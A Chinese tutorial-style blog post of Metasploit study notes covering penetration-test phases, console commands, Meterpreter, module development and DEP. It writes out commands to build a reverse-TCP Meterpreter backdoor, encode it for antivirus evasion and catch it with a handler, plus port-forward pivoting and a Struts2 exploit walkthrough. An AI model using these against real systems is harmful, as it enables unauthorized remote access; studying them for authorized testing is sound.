metasploit基本用法

    1.渗透测试

             metasploit几乎包含了渗透测试所有的工具,涉及渗透测试7个阶段。

        前期交互阶段:与客户讨论并确定渗透测试的范围和目标

        情报搜集阶段:采取各种手段搜集被攻击者的有用信息

        威胁建模阶段:通过搜集的情报信息, 标识目标系统可能存在的安全隐患

        漏洞分析阶段:分析漏洞的可行性以及最可行的攻击方法

        渗透攻击阶段:对目标进行渗透

        后攻击阶段:根据目标的不同, 灵活的应用不同技术. 让目标系统发挥更大的价值

        书写渗透报告阶段:撰写渗透报告

     使用元编程:metaprogramming语言自身作为程序数据输入的编程思想。

                            语言同时也是自身的元语言的能力称之为反射

       2.metasploit基本用法

             banner:查看版本信息

             db_driver:metasploit测试前,需要连接数据库(有的版本自动连接)db_connect

             search:查找相关模块shellcode(search name:**)

             use:使用模块back退出

             show options:查看模块参数设置

             set:设置参数信息或加载PAYLOAD(setg设置后保存)

             exploit:渗透攻击(run别名)

             check:测试target(目标操作系统)设置是否正确

             edit:编辑当前模块

             irb:ruby脚本命令行模式

             jobs:查看控制台上的任务

       3.metasploit攻击方式分类

             635种(exploit)溢出模块、314种(auxiliary)辅助模块、215种(payload)加载模块、27种(encoder免杀处理用)编码、8种(nops)

                          溢出攻击:主动溢出和被动溢出(主动攻击获取权限和监听获取权限)

       4.meterpreter模块

             msfpayload制作后门程序,在远端电脑运行,使用msfencode制作免杀
             msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.101.105 LPORT=444 X>meter.exe
             
             本机msfconsole
                   use exploit/multi/handler
                   set PAYLOAD windows/meterpreter/reverse_tcp
                   set LHOST 0.0.0.0
                   set LPORT 444
                   show options
                   run/exploit    攻击并连接远端后门,进入meterpreter
                   
              基本隧道代理功能 
                   portfwd   -h  (portfwd add -l 2222 -r 10.1.1.129 - p 3389 反弹10.1.1.129端口3389到本地2222并监听)
                   pivot 
              二级代理/三级代理
                   ...
       5.metasploit二次开发

             metasploit所有模块使用ruby编写,msfcli用户接口程序,2015.6.8已被官方团队移除,但仍然可以使用            

             metasploit所有模块继承自msf::Module,模块写好后,重启console在响应的exploit、auxiliary、payload、endcoder、nops目录中可以看到

       6.系统DEP保护        

             系统内存溢出漏洞,根因在于系统代码段和数据段没有明确的划分。DEP保护,阻止数据页执行shellcode代码

                   计算机->系统属性->高级->性能->数据执行保护(windows软件DEP、最下角显示CPU硬件是否支持DEP)

             DEP保护分为:软件DEP即SafeSEH(编译后生成合法的函数地址加以保护,以区分异常数据页函数),硬件DEP(标记NX不可执行区域)

                       SafeSEH和SEH(结构异常处理)不同,SEH需要构建SEH链表指针,以线程为单位。汇编中注册异常回调函数如下:

                            (FS寄存器,存放线程TEB数据)

            VS开发中,DEP保护链接默认开启

                   


本文参考:

metasploit教程:

http://pan.baidu.com/s/1kT3RuL5

相关论坛:

http://bbs.pediy.com(看雪论坛)

http://www.wooyun.org(乌云)

http://blog.sina.com.cn/s/blog_721d9f340100nkw5.html

http://bobao.360.cn/news/detail/1132.html 相关资源整理

https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/ 国外的安全技术网站(介绍meterpreter)

https://www.91ri.org/tag/metasploit

http://www.docin.com/p-499012506.html

http://www.cnblogs.com/dsky/archive/2013/04/26/3044626.html(DEP)

http://www.hx95.com/Article/Ddos/201501/85101.html (meterpreter)

  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Metasploit 是一个常用的渗透测试框架,它可以帮助安全研究人员和渗透测试人员识别和利用漏洞,以便在测试过程中评估网络和系统的安全性。以下是 Metasploit 渗透测试框架的基本使用方法: 1. 安装 MetasploitMetasploit 可以在 Windows、Linux 和 Mac OS X 等操作系统上运行。你可以从 Metasploit 的官方网站下载并安装它。 2. 启动 Metasploit:在命令行界面中输入 msfconsole 命令启动 Metasploit。 3. 搜索漏洞:在 Metasploit 中,你可以使用 search 命令来搜索漏洞。例如,如果你想搜索所有与 Apache 相关的漏洞,可以输入以下命令: search apache 4. 选择漏洞:通过搜索漏洞,你可以找到感兴趣的漏洞,并且可以使用 use 命令来选择一个要利用的漏洞。例如,如果你想选择 Apache Struts2 远程代码执行漏洞,可以输入以下命令: use exploit/multi/http/struts2_content_type_ognl 5. 配置选项:在选择漏洞后,你需要配置一些选项,例如目标 IP 地址和端口号、攻击载荷等。可以使用 show options 命令来查看所有可用选项,并使用 set 命令来配置选项。例如,如果你想设置目标 IP 地址为 192.168.1.100,可以输入以下命令: set RHOST 192.168.1.100 6. 运行攻击:在配置选项后,你可以使用 exploit 命令来运行攻击。Metasploit 将自动启动攻击载荷,并尝试利用漏洞。例如,如果你想运行 Apache Struts2 远程代码执行漏洞攻击,可以输入以下命令: exploit 7. 获取访问权限:如果攻击成功,Metasploit 将尝试获取访问权限。在访问权限获取之后,你可以使用 shell 命令来访问目标系统的命令行界面。例如,如果你想访问目标系统的 shell,可以输入以下命令: shell 上述是 Metasploit 渗透测试框架的基本使用方法,但请注意,在进行渗透测试时,请确保获得了所有必要的授权和许可,以避免违反法律和伦理规定。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值